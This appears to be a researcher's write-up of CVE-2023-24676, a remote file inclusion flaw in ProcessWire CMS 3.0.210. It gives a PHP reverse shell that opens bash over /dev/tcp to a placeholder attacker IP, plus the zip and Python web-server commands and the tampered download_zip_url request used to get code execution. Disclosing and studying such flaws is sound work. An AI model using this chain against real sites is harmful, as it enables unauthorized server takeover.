CVE-2023-24676 | The Power of Remote File Inclusion in Proccesswire CMS

Whats is Processwire?

ProcessWire is a popular open-source content management system (CMS) written in PHP, featuring a powerful API designed to streamline development and save time. In version 3.0.210, a vulnerability was discovered that could potentially compromise the security of the CMS.

This vulnerability on version 3.0.210

To perform the exploration, we require a user account with administrative privileges and the application must have debug mode activated. Once logged into the application, we navigate to the “Modules” section and select “Install.”

Upon accessing the “Modules” section, we can see a range of modules available for installation in ProcessWire. For our investigation, we specifically chose to install the Comment module by clicking on the “Install” button.

When intercepting the request using Burp Suite, we were able to identify that the “download_zip_url” parameter was blank.

Next, I created a basic reverse shell in PHP and compressed it into a zip file on my Virtual Private Server (VPS).

For reference, here is the PHP code used to create the reverse shell:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/{YOUR-IP-ADDRESS}/{YOUR-PORT} 0>&1'");
?>

Note that you need to replace “{YOUR-IP-ADDRESS}” and “{YOUR-PORT}” with your own IP address and a desired port number respectively.

To compress the “pwn.php” file into a zip archive, I used the following command:

zip plugin.zip pwn.php

This command creates a zip archive called “plugin.zip” that contains the “pwn.php” file.

To serve the compressed “plugin.zip” file to the application, I opened a Python web server by running the following command:

python3 -m http.server 8000

After setting up the Python web server, I began listening on port 443 for incoming connections. Once the application imported the “plugin.zip” file and executed the “pwn.php” file within it, we received a reverse shell of the target system. This allowed us to gain access and potentially exploit any vulnerabilities present in the system.

To inject the malicious code into the ProcessWire application, I intercepted the plugin installation request once again. This time, I inserted the URL of the VPS containing the “plugin.zip” file with the malicious “pwn.php” code.

By doing so, when the application attempted to install the plugin, it would fetch and execute the contents of the “pwn.php” file, which would establish a reverse shell connection to our listening server. This would allow us to gain unauthorized access to the target system.

We received the reverse shell successfully ;)

Thanks for reading my article!

So, I just wanted to say thanks again for joining me on this journey. Here’s to more adventures in the wonderful world of hacking! Until next time, keep your firewalls strong and your code even stronger.